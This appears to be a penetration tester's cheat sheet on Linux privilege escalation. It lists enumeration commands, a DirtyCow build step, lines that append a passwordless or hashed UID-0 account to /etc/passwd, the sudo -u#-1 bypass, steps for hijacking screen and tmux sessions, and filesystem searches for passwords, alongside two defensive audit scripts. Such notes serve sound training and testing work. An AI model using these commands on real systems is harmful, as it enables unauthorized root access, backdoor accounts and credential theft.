Linux Privilege Escalation
2024-03-05 21:04:27

Basic Manual Enumeration

Enumerating Users

whoami
id
cat /etc/passwd

#Info about me
id || (whoami && groups) 2>/dev/null
#List all users
cat /etc/passwd | cut -d: -f1
#List users with console
cat /etc/passwd | grep "sh$"
#List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
#Currently logged users
w
#Login history
last | tail
#Last log of each user
lastlog

#List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
#Current user PGP keys
gpg --list-keys 2>/dev/null

Check Password Policy

grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs

Enumerating Environment

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Check Clipboard

if command -v xclip >/dev/null 2>&1; then
    echo "Clipboard: $(xclip -o -selection clipboard 2>/dev/null)"
    echo "Highlighted text: $(xclip -o 2>/dev/null)"
elif command -v xsel >/dev/null 2>&1; then
    echo "Clipboard: $(xsel -ob 2>/dev/null)"
    echo "Highlighted text: $(xsel -o 2>/dev/null)"
else
    echo "Neither xclip nor xsel found"
fi

Enumerating Hostname

hostname

Enumerating System

uname -a
cat /etc/issue
cat /proc/version
cat /etc/*-release
(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems

Enumerating Processes and Services

# List running processes
ps aux --forest

# List network connections
netstat -ano
ss -antlp

# List packages
dpkg -l

Enumerating Network

ip a
ifconfig
route -n # "route print" is the Windows form; on Linux use route -n or ip route
netstat -ie

Enumerating Scheduled Tasks

ls -la /etc/cron*
cat /etc/crontab
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

Enumerating Mountables

cat /etc/fstab
mount
lsblk

Kernel Exploits

cat /proc/version
uname -a
searchsploit "Linux Kernel"

To extract all kernel exploits on the web:

curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^[0-9]\.[0-9]$" | sort -u -r | tr '\n' ' ' # grep has no \d in BRE; [0-9] is used instead

DirtyCow

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c

File Permissions

Writable

find / -writable -type f 2>/dev/null

find / '(' -type f -or -type d ')' '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v "$HOME" | sort | uniq #Find files owned by the user or writable by anybody
for g in $(groups); do find / \( -type f -or -type d \) -group "$g" -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v "$HOME"; done #Find files writable by any group of the user

Writable /etc/passwd

openssl passwd -1 <passwd>
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash

Eg. hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash

Or add a user without a password:

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
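
A defender-side check for the two tampering patterns shown above (an extra UID-0 entry carrying an inline hash, and a passwordless UID-0 entry), as an added example that is not part of the original notes. It audits a constructed sample file built inline; `audit_passwd` and `check_passwd_mode` are names chosen here, and `check_passwd_mode` assumes GNU `stat`.

```bash
# Constructed sample of an /etc/passwd tampered with in the ways described above:
# a second UID-0 account with a hash stored inline, and a passwordless UID-0 account.
SAMPLE_PASSWD="$(mktemp)"
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
dummy::0:0::/root:/bin/bash
EOF

# Report UID-0 accounts other than root, accounts whose password field is empty
# (no password required), and accounts whose password field holds a hash directly
# (bypassing /etc/shadow). Prints "<reason>:<user>" per finding; returns 1 if any.
audit_passwd() {
    awk -F: '
        $3 == 0 && $1 != "root" { print "extra-uid0:" $1; found = 1 }
        $2 == ""                 { print "empty-password:" $1; found = 1 }
        $2 ~ /^\$/               { print "hash-in-passwd:" $1; found = 1 }
        END { if (found) exit 1; exit 0 }
    ' "$1"
}

# Flag the precondition for this tampering: the file being group- or world-writable.
# Prints the octal mode; returns 1 if a write bit is set for group or other.
check_passwd_mode() {
    mode=$(stat -c '%a' "$1")   # GNU stat (assumption); e.g. 644
    echo "mode: $mode"
    case $mode in
        *[2367])  return 1 ;;   # last digit: "other" has write
        *[2367]?) return 1 ;;   # second-to-last digit: "group" has write
    esac
    return 0
}

# Run against the sample; on a real host point both functions at /etc/passwd.
audit_passwd "$SAMPLE_PASSWD"
check_passwd_mode "$SAMPLE_PASSWD"
```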

SUID Binaries

find / -type f -perm -u=s 2>/dev/null
find / -perm -4000 2>/dev/null

SUDO

Intended Functionality

cat /etc/sudoers
sudo -l

After identifying which binaries we can run via sudo, check https://gtfobins.github.io/ to see whether any of them can be used to escalate privileges.

Version

Check vulnerable sudo versions

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\|1\.8\.2[01234567]" # matches 1.x.y below 1.8.28

SUDO < v1.8.28

sudo -u#-1 /bin/bash
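
An added example (not from the original notes) that makes the version check above robust: it parses the first line of `sudo -V` and compares the version numerically against 1.8.28, the first release not affected by the `-u#-1` bypass, so that a version such as 1.8.9 is not mistaken for a newer release by string matching. Function names are chosen here and the sample version strings are constructed.

```bash
# "Sudo version 1.8.27p1" -> "1.8.27"; suffixes such as p1 or b2 are dropped.
sudo_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.]*\).*/\1/p' | head -n1
}

# Returns 0 if dotted version $1 is strictly lower than $2, 1 otherwise.
# Components are compared as integers, so 1.8.9 < 1.8.28 and 1.8 < 1.8.28.
version_lt() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}              # leading component of each
        if [ "$x" = "$a" ]; then a=; else a=${a#*.}; fi
        if [ "$y" = "$b" ]; then b=; else b=${b#*.}; fi
        x=${x:-0}; y=${y:-0}                # missing component counts as 0
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
    done
    return 1
}

# Takes the raw `sudo -V` output; returns 0 if the version predates 1.8.28,
# 1 if it is 1.8.28 or newer, 2 if no version line could be parsed.
sudo_is_vulnerable() {
    v=$(sudo_version_from_output "$1")
    [ -n "$v" ] || return 2
    version_lt "$v" 1.8.28
}

# Constructed sample output; on a host use: sudo_is_vulnerable "$(sudo -V 2>/dev/null)"
SAMPLE_SUDO_V='Sudo version 1.8.27p1
Sudoers policy plugin version 1.8.27p1'
if sudo_is_vulnerable "$SAMPLE_SUDO_V"; then
    echo "sudo predates 1.8.28: upgrade"
else
    echo "sudo is 1.8.28 or newer"
fi
```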

Automated Enumeration

LinPeas

A bash script run on the local machine

https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/linpeas.sh

Unix-Priv-Esc-Check

On Kali, the script is located at

/usr/share/unix-privesc-check/unix-privesc-check

Standard run:

unix-privesc-check standard

MISC

When escalating privileges via a SUID program that runs /bin/bash, remember to use the -p flag: bash resets its effective UID to the real UID on startup unless -p is specified, silently dropping the privileges the SUID bit granted.

Open Shell Sessions

screen -ls
screen -dr <session> #The -d detaches whoever is currently attached
screen -dr 3350.foo #Example session name as listed by screen -ls

tmux ls
ps aux | grep tmux #Search for tmux servers not using the default socket directory
tmux -S /tmp/dev_sess ls #List sessions on that socket; a session can be started on it with: tmux -S /tmp/dev_sess

tmux attach -t myname #Anything typed in this session also appears in the other attached client
tmux attach -d -t myname #First detach the session from the other client, then attach yourself

ls -la /tmp/dev_sess #Check who can access the socket
rw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and the devs group can
# If you are root or in the devs group you can access it
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket

Getting Desperate

Find any files with “pass” in them

grep -R -i "pass" --color=always . 2> >(grep -v 'Permission denied' >&2) # bash process substitution filters the noise from stderr
grep --color=auto -rnw '/' -ie "PASS" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASS" {} /dev/null \;